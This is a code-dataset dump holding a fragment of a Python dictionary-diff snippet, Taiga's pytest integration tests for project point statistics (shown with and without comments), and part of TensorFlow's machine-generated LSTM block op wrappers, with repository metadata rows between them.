differentKeyList = differentKeys(longerList, shorterList)
differenceDict = difference(differentKeyList, d1, d2)
return (intersectDict, differenceDict)
print(diff_dictionary(d1, d2))
| true
| true
|
790dd3e88fd0cb334c6be5fcb08e85a2cb6784e1
| 7,245
|
py
|
Python
|
docker-images/taigav2/taiga-back/tests/integration/test_stats.py
|
mattcongy/itshop
|
6be025a9eaa7fe7f495b5777d1f0e5a3184121c9
|
[
"MIT"
] | 1
|
2017-05-29T19:01:06.000Z
|
2017-05-29T19:01:06.000Z
|
docker-images/taigav2/taiga-back/tests/integration/test_stats.py
|
mattcongy/itshop
|
6be025a9eaa7fe7f495b5777d1f0e5a3184121c9
|
[
"MIT"
] | null | null | null |
docker-images/taigav2/taiga-back/tests/integration/test_stats.py
|
mattcongy/itshop
|
6be025a9eaa7fe7f495b5777d1f0e5a3184121c9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# Copyright (C) 2014-2016 Anler Hernández <hello@anler.me>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pytest
from .. import factories as f
from tests.utils import disconnect_signals, reconnect_signals
from taiga.projects.services.stats import get_stats_for_project
pytestmark = pytest.mark.django_db
def setup_module(module):
disconnect_signals()
def teardown_module(module):
reconnect_signals()
@pytest.fixture
def data():
m = type("Models", (object,), {})
m.user = f.UserFactory.create()
m.project = f.ProjectFactory(is_private=False, owner=m.user)
m.role1 = f.RoleFactory(project=m.project)
m.role2 = f.RoleFactory(project=m.project)
m.null_points = f.PointsFactory(project=m.project, value=None)
m.default_points = f.PointsFactory(project=m.project, value=0)
m.points1 = f.PointsFactory(project=m.project, value=1)
m.points2 = f.PointsFactory(project=m.project, value=2)
m.points3 = f.PointsFactory(project=m.project, value=4)
m.points4 = f.PointsFactory(project=m.project, value=8)
m.points5 = f.PointsFactory(project=m.project, value=16)
m.points6 = f.PointsFactory(project=m.project, value=32)
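    # The point values form successive powers of two (1..32), so each
    # expected per-role total in the tests below (1, 3, 7, ..., 63) pins
    # down exactly which user stories contribute to it.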
m.open_status = f.UserStoryStatusFactory(is_closed=False)
m.closed_status = f.UserStoryStatusFactory(is_closed=True)
m.project.default_points = m.default_points
m.project.save()
m.user_story1 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story1.role_points.filter(role=m.role1).update(points=m.points1)
m.user_story2 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story2.role_points.filter(role=m.role1).update(points=m.points2)
m.user_story3 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story3.role_points.filter(role=m.role1).update(points=m.points3)
m.user_story4 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story4.role_points.filter(role=m.role1).update(points=m.points4)
    # user stories 5 and 6 are in closed milestones
m.user_story5 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone__closed=True,
milestone__project=m.project)
m.user_story5.role_points.filter(role=m.role1).update(points=m.points5)
m.user_story6 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone__closed=True,
milestone__project=m.project)
m.user_story6.role_points.filter(role=m.role1).update(points=m.points6)
return m
def test_project_defined_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["defined_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
data.user_story1.role_points.filter(role=data.role1).update(points=data.default_points)
data.user_story1.role_points.filter(role=data.role2).update(points=data.points1)
project_stats = get_stats_for_project(data.project)
assert project_stats["defined_points_per_role"] == {data.role1.pk: 62, data.role2.pk: 1}
def test_project_closed_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {}
data.user_story1.is_closed = True
data.user_story1.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 1, data.role2.pk: 0}
data.user_story2.is_closed = True
data.user_story2.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 3, data.role2.pk: 0}
data.user_story3.is_closed = True
data.user_story3.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 7, data.role2.pk: 0}
data.user_story4.is_closed = True
data.user_story4.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 15, data.role2.pk: 0}
data.user_story5.is_closed = True
data.user_story5.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 31, data.role2.pk: 0}
data.user_story6.is_closed = True
data.user_story6.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points"] == 63
assert project_stats["speed"] == 24
def test_project_assigned_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 48, data.role2.pk: 0}
data.user_story1.milestone = data.user_story6.milestone
data.user_story1.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 49, data.role2.pk: 0}
data.user_story2.milestone = data.user_story6.milestone
data.user_story2.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 51, data.role2.pk: 0}
data.user_story3.milestone = data.user_story6.milestone
data.user_story3.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 55, data.role2.pk: 0}
data.user_story4.milestone = data.user_story6.milestone
data.user_story4.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
| 44.447853
| 93
| 0.696894
|
import pytest
from .. import factories as f
from tests.utils import disconnect_signals, reconnect_signals
from taiga.projects.services.stats import get_stats_for_project
pytestmark = pytest.mark.django_db
def setup_module(module):
disconnect_signals()
def teardown_module(module):
reconnect_signals()
@pytest.fixture
def data():
m = type("Models", (object,), {})
m.user = f.UserFactory.create()
m.project = f.ProjectFactory(is_private=False, owner=m.user)
m.role1 = f.RoleFactory(project=m.project)
m.role2 = f.RoleFactory(project=m.project)
m.null_points = f.PointsFactory(project=m.project, value=None)
m.default_points = f.PointsFactory(project=m.project, value=0)
m.points1 = f.PointsFactory(project=m.project, value=1)
m.points2 = f.PointsFactory(project=m.project, value=2)
m.points3 = f.PointsFactory(project=m.project, value=4)
m.points4 = f.PointsFactory(project=m.project, value=8)
m.points5 = f.PointsFactory(project=m.project, value=16)
m.points6 = f.PointsFactory(project=m.project, value=32)
m.open_status = f.UserStoryStatusFactory(is_closed=False)
m.closed_status = f.UserStoryStatusFactory(is_closed=True)
m.project.default_points = m.default_points
m.project.save()
m.user_story1 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story1.role_points.filter(role=m.role1).update(points=m.points1)
m.user_story2 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story2.role_points.filter(role=m.role1).update(points=m.points2)
m.user_story3 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story3.role_points.filter(role=m.role1).update(points=m.points3)
m.user_story4 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone=None)
m.user_story4.role_points.filter(role=m.role1).update(points=m.points4)
m.user_story5 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone__closed=True,
milestone__project=m.project)
m.user_story5.role_points.filter(role=m.role1).update(points=m.points5)
m.user_story6 = f.UserStoryFactory(project=m.project,
status=m.open_status,
milestone__closed=True,
milestone__project=m.project)
m.user_story6.role_points.filter(role=m.role1).update(points=m.points6)
return m
def test_project_defined_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["defined_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
data.user_story1.role_points.filter(role=data.role1).update(points=data.default_points)
data.user_story1.role_points.filter(role=data.role2).update(points=data.points1)
project_stats = get_stats_for_project(data.project)
assert project_stats["defined_points_per_role"] == {data.role1.pk: 62, data.role2.pk: 1}
def test_project_closed_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {}
data.user_story1.is_closed = True
data.user_story1.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 1, data.role2.pk: 0}
data.user_story2.is_closed = True
data.user_story2.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 3, data.role2.pk: 0}
data.user_story3.is_closed = True
data.user_story3.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 7, data.role2.pk: 0}
data.user_story4.is_closed = True
data.user_story4.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 15, data.role2.pk: 0}
data.user_story5.is_closed = True
data.user_story5.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 31, data.role2.pk: 0}
data.user_story6.is_closed = True
data.user_story6.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
project_stats = get_stats_for_project(data.project)
assert project_stats["closed_points"] == 63
assert project_stats["speed"] == 24
def test_project_assigned_points(client, data):
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 48, data.role2.pk: 0}
data.user_story1.milestone = data.user_story6.milestone
data.user_story1.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 49, data.role2.pk: 0}
data.user_story2.milestone = data.user_story6.milestone
data.user_story2.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 51, data.role2.pk: 0}
data.user_story3.milestone = data.user_story6.milestone
data.user_story3.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 55, data.role2.pk: 0}
data.user_story4.milestone = data.user_story6.milestone
data.user_story4.save()
project_stats = get_stats_for_project(data.project)
assert project_stats["assigned_points_per_role"] == {data.role1.pk: 63, data.role2.pk: 0}
| true
| true
|
790dd55b6ff7676f8e99726f40e97383ef46a967
| 35,128
|
py
|
Python
|
Plugins/UnrealEnginePython/Binaries/Win64/Lib/site-packages/tensorflow/contrib/rnn/ops/gen_lstm_ops.py
|
JustinACoder/H22-GR3-UnrealAI
|
361eb9ef1147f8a2991e5f98c4118cd823184adf
|
[
"MIT"
] | 6
|
2022-02-04T18:12:24.000Z
|
2022-03-21T23:57:12.000Z
|
Lib/site-packages/tensorflow/contrib/rnn/ops/gen_lstm_ops.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/contrib/rnn/ops/gen_lstm_ops.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | 1
|
2022-02-08T03:53:23.000Z
|
2022-02-08T03:53:23.000Z
|
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util.tf_export import tf_export
_block_lstm_outputs = ["i", "cs", "f", "o", "ci", "co", "h"]
_BlockLSTMOutput = _collections.namedtuple(
"BlockLSTM", _block_lstm_outputs)
@tf_export('block_lstm')
def block_lstm(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None):
r"""Computes the LSTM cell forward propagation for all the time steps.
This is equivalent to applying LSTMBlockCell in a loop, like so:
```python
for x1 in unpack(x):
i1, cs1, f1, o1, ci1, co1, h1 = LSTMBlock(
x1, cs_prev, h_prev, w, wci, wcf, wco, b)
cs_prev = cs1
h_prev = h1
i.append(i1)
cs.append(cs1)
f.append(f1)
o.append(o1)
ci.append(ci1)
co.append(co1)
h.append(h1)
  return pack(i), pack(cs), pack(f), pack(o), pack(ci), pack(co), pack(h)
```
Args:
seq_len_max: A `Tensor` of type `int64`.
Maximum time length actually used by this input. Outputs are padded
with zeros beyond this length.
x: A `Tensor`. Must be one of the following types: `half`, `float32`.
The sequence input to the LSTM, shape (timelen, batch_size, num_inputs).
cs_prev: A `Tensor`. Must have the same type as `x`.
Value of the initial cell state.
h_prev: A `Tensor`. Must have the same type as `x`.
Initial output of cell (to be used for peephole).
w: A `Tensor`. Must have the same type as `x`. The weight matrix.
wci: A `Tensor`. Must have the same type as `x`.
The weight matrix for input gate peephole connection.
wcf: A `Tensor`. Must have the same type as `x`.
The weight matrix for forget gate peephole connection.
wco: A `Tensor`. Must have the same type as `x`.
The weight matrix for output gate peephole connection.
b: A `Tensor`. Must have the same type as `x`. The bias vector.
forget_bias: An optional `float`. Defaults to `1`. The forget gate bias.
cell_clip: An optional `float`. Defaults to `3`.
Value to clip the 'cs' value to.
use_peephole: An optional `bool`. Defaults to `False`.
Whether to use peephole weights.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (i, cs, f, o, ci, co, h).
i: A `Tensor`. Has the same type as `x`. The input gate over the whole time sequence.
cs: A `Tensor`. Has the same type as `x`. The cell state before the tanh over the whole time sequence.
f: A `Tensor`. Has the same type as `x`. The forget gate over the whole time sequence.
o: A `Tensor`. Has the same type as `x`. The output gate over the whole time sequence.
ci: A `Tensor`. Has the same type as `x`. The cell input over the whole time sequence.
co: A `Tensor`. Has the same type as `x`. The cell after the tanh over the whole time sequence.
h: A `Tensor`. Has the same type as `x`. The output h vector over the whole time sequence.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"BlockLSTM", seq_len_max=seq_len_max, x=x, cs_prev=cs_prev,
h_prev=h_prev, w=w, wci=wci, wcf=wcf, wco=wco, b=b,
forget_bias=forget_bias, cell_clip=cell_clip,
use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("forget_bias", _op.get_attr("forget_bias"), "cell_clip",
_op.get_attr("cell_clip"), "use_peephole",
_op.get_attr("use_peephole"), "T", _op.get_attr("T"))
_execute.record_gradient(
"BlockLSTM", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name, "BlockLSTM",
name, _ctx._post_execution_callbacks, seq_len_max, x, cs_prev, h_prev,
w, wci, wcf, wco, b, "forget_bias", forget_bias, "cell_clip",
cell_clip, "use_peephole", use_peephole)
_result = _BlockLSTMOutput._make(_result)
return _result
except _core._FallbackException:
return block_lstm_eager_fallback(
seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b,
forget_bias=forget_bias, cell_clip=cell_clip,
use_peephole=use_peephole, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def block_lstm_eager_fallback(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function block_lstm
"""
_ctx = ctx if ctx else _context.context()
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b) = _inputs_T
seq_len_max = _ops.convert_to_tensor(seq_len_max, _dtypes.int64)
_inputs_flat = [seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b]
_attrs = ("forget_bias", forget_bias, "cell_clip", cell_clip,
"use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"BlockLSTM", 7, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BlockLSTM", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMOutput._make(_result)
return _result
_ops.RegisterShape("BlockLSTM")(None)
_block_lstm_grad_outputs = ["x_grad", "cs_prev_grad", "h_prev_grad", "w_grad",
"wci_grad", "wcf_grad", "wco_grad", "b_grad"]
_BlockLSTMGradOutput = _collections.namedtuple(
"BlockLSTMGrad", _block_lstm_grad_outputs)
@tf_export('block_lstm_grad')
def block_lstm_grad(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad, use_peephole, name=None):
r"""Computes the LSTM cell backward propagation for the entire time sequence.
This implementation is to be used in conjunction of LSTMBlock.
Args:
seq_len_max: A `Tensor` of type `int64`.
Maximum time length actually used by this input. Outputs are padded
with zeros beyond this length.
x: A `Tensor`. Must be one of the following types: `half`, `float32`.
The sequence input to the LSTM, shape (timelen, batch_size, num_inputs).
cs_prev: A `Tensor`. Must have the same type as `x`.
Value of the initial cell state.
h_prev: A `Tensor`. Must have the same type as `x`.
Initial output of cell (to be used for peephole).
w: A `Tensor`. Must have the same type as `x`. The weight matrix.
wci: A `Tensor`. Must have the same type as `x`.
The weight matrix for input gate peephole connection.
wcf: A `Tensor`. Must have the same type as `x`.
The weight matrix for forget gate peephole connection.
wco: A `Tensor`. Must have the same type as `x`.
The weight matrix for output gate peephole connection.
b: A `Tensor`. Must have the same type as `x`. The bias vector.
i: A `Tensor`. Must have the same type as `x`.
The input gate over the whole time sequence.
cs: A `Tensor`. Must have the same type as `x`.
The cell state before the tanh over the whole time sequence.
f: A `Tensor`. Must have the same type as `x`.
The forget gate over the whole time sequence.
o: A `Tensor`. Must have the same type as `x`.
The output gate over the whole time sequence.
ci: A `Tensor`. Must have the same type as `x`.
The cell input over the whole time sequence.
co: A `Tensor`. Must have the same type as `x`.
The cell after the tanh over the whole time sequence.
h: A `Tensor`. Must have the same type as `x`.
The output h vector over the whole time sequence.
cs_grad: A `Tensor`. Must have the same type as `x`.
The current gradient of cs.
h_grad: A `Tensor`. Must have the same type as `x`.
The gradient of h vector.
use_peephole: A `bool`. Whether to use peephole weights.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (x_grad, cs_prev_grad, h_prev_grad, w_grad, wci_grad, wcf_grad, wco_grad, b_grad).
x_grad: A `Tensor`. Has the same type as `x`. The gradient of x to be back-propped.
cs_prev_grad: A `Tensor`. Has the same type as `x`. The gradient of cs_prev to be back-propped.
h_prev_grad: A `Tensor`. Has the same type as `x`. The gradient of h_prev to be back-propped.
w_grad: A `Tensor`. Has the same type as `x`. The gradient for w to be back-propped.
wci_grad: A `Tensor`. Has the same type as `x`. The gradient for wci to be back-propped.
wcf_grad: A `Tensor`. Has the same type as `x`. The gradient for wcf to be back-propped.
wco_grad: A `Tensor`. Has the same type as `x`. The gradient for wco to be back-propped.
b_grad: A `Tensor`. Has the same type as `x`. The gradient for w to be back-propped.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"BlockLSTMGrad", seq_len_max=seq_len_max, x=x, cs_prev=cs_prev,
h_prev=h_prev, w=w, wci=wci, wcf=wcf, wco=wco, b=b, i=i, cs=cs, f=f,
o=o, ci=ci, co=co, h=h, cs_grad=cs_grad, h_grad=h_grad,
use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("use_peephole", _op.get_attr("use_peephole"), "T",
_op.get_attr("T"))
_execute.record_gradient(
"BlockLSTMGrad", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMGradOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BlockLSTMGrad", name, _ctx._post_execution_callbacks, seq_len_max, x,
cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad,
h_grad, "use_peephole", use_peephole)
_result = _BlockLSTMGradOutput._make(_result)
return _result
except _core._FallbackException:
return block_lstm_grad_eager_fallback(
seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o,
ci, co, h, cs_grad, h_grad, use_peephole=use_peephole, name=name,
ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def block_lstm_grad_eager_fallback(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad, use_peephole, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function block_lstm_grad
"""
_ctx = ctx if ctx else _context.context()
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad) = _inputs_T
seq_len_max = _ops.convert_to_tensor(seq_len_max, _dtypes.int64)
_inputs_flat = [seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad]
_attrs = ("use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"BlockLSTMGrad", 8, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BlockLSTMGrad", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMGradOutput._make(_result)
return _result
_ops.RegisterShape("BlockLSTMGrad")(None)
_lstm_block_cell_outputs = ["i", "cs", "f", "o", "ci", "co", "h"]
_LSTMBlockCellOutput = _collections.namedtuple(
"LSTMBlockCell", _lstm_block_cell_outputs)
@tf_export('lstm_block_cell')
def lstm_block_cell(x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None):
r"""Computes the LSTM cell forward propagation for 1 time step.
  This implementation uses a single weight matrix and a single bias vector,
  and there is an optional peephole connection.
This kernel op implements the following mathematical equations:
```python
xh = [x, h_prev]
  [i, ci, f, o] = xh * w + b
f = f + forget_bias
if not use_peephole:
wci = wcf = wco = 0
i = sigmoid(cs_prev * wci + i)
f = sigmoid(cs_prev * wcf + f)
ci = tanh(ci)
cs = ci .* i + cs_prev .* f
cs = clip(cs, cell_clip)
o = sigmoid(cs * wco + o)
co = tanh(cs)
h = co .* o
```
Args:
x: A `Tensor`. Must be one of the following types: `half`, `float32`.
The input to the LSTM cell, shape (batch_size, num_inputs).
cs_prev: A `Tensor`. Must have the same type as `x`.
Value of the cell state at previous time step.
h_prev: A `Tensor`. Must have the same type as `x`.
Output of the previous cell at previous time step.
w: A `Tensor`. Must have the same type as `x`. The weight matrix.
wci: A `Tensor`. Must have the same type as `x`.
The weight matrix for input gate peephole connection.
wcf: A `Tensor`. Must have the same type as `x`.
The weight matrix for forget gate peephole connection.
wco: A `Tensor`. Must have the same type as `x`.
The weight matrix for output gate peephole connection.
b: A `Tensor`. Must have the same type as `x`. The bias vector.
forget_bias: An optional `float`. Defaults to `1`. The forget gate bias.
cell_clip: An optional `float`. Defaults to `3`.
Value to clip the 'cs' value to.
use_peephole: An optional `bool`. Defaults to `False`.
Whether to use peephole weights.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (i, cs, f, o, ci, co, h).
i: A `Tensor`. Has the same type as `x`. The input gate.
cs: A `Tensor`. Has the same type as `x`. The cell state before the tanh.
f: A `Tensor`. Has the same type as `x`. The forget gate.
o: A `Tensor`. Has the same type as `x`. The output gate.
ci: A `Tensor`. Has the same type as `x`. The cell input.
co: A `Tensor`. Has the same type as `x`. The cell after the tanh.
h: A `Tensor`. Has the same type as `x`. The output h vector.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"LSTMBlockCell", x=x, cs_prev=cs_prev, h_prev=h_prev, w=w, wci=wci,
wcf=wcf, wco=wco, b=b, forget_bias=forget_bias, cell_clip=cell_clip,
use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("forget_bias", _op.get_attr("forget_bias"), "cell_clip",
_op.get_attr("cell_clip"), "use_peephole",
_op.get_attr("use_peephole"), "T", _op.get_attr("T"))
_execute.record_gradient(
"LSTMBlockCell", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"LSTMBlockCell", name, _ctx._post_execution_callbacks, x, cs_prev,
h_prev, w, wci, wcf, wco, b, "forget_bias", forget_bias, "cell_clip",
cell_clip, "use_peephole", use_peephole)
_result = _LSTMBlockCellOutput._make(_result)
return _result
except _core._FallbackException:
return lstm_block_cell_eager_fallback(
x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=forget_bias,
cell_clip=cell_clip, use_peephole=use_peephole, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
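The docstring equations above translate almost line for line into NumPy. The sketch below is a hedged reference implementation, not the kernel itself; the symmetric reading of `clip` and the `[i, ci, f, o]` gate packing are assumptions consistent with the docstring and with the `dicfo` gradient output defined later in this file.

```python
# Minimal NumPy sketch of the forward equations in the docstring above.
import numpy as np

def _sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def lstm_block_cell_reference(x, cs_prev, h_prev, w, wci, wcf, wco, b,
                              forget_bias=1.0, cell_clip=3.0,
                              use_peephole=False):
    xh = np.concatenate([x, h_prev], axis=1)       # [batch, inputs + cells]
    i, ci, f, o = np.split(xh @ w + b, 4, axis=1)  # gate pre-activations
    f = f + forget_bias
    if not use_peephole:
        wci = wcf = wco = 0.0
    i = _sigmoid(cs_prev * wci + i)
    f = _sigmoid(cs_prev * wcf + f)
    ci = np.tanh(ci)
    cs = np.clip(ci * i + cs_prev * f, -cell_clip, cell_clip)
    o = _sigmoid(cs * wco + o)
    co = np.tanh(cs)
    h = co * o
    return i, cs, f, o, ci, co, h
```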
def lstm_block_cell_eager_fallback(x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function lstm_block_cell
"""
_ctx = ctx if ctx else _context.context()
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b) = _inputs_T
_inputs_flat = [x, cs_prev, h_prev, w, wci, wcf, wco, b]
_attrs = ("forget_bias", forget_bias, "cell_clip", cell_clip,
"use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"LSTMBlockCell", 7, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
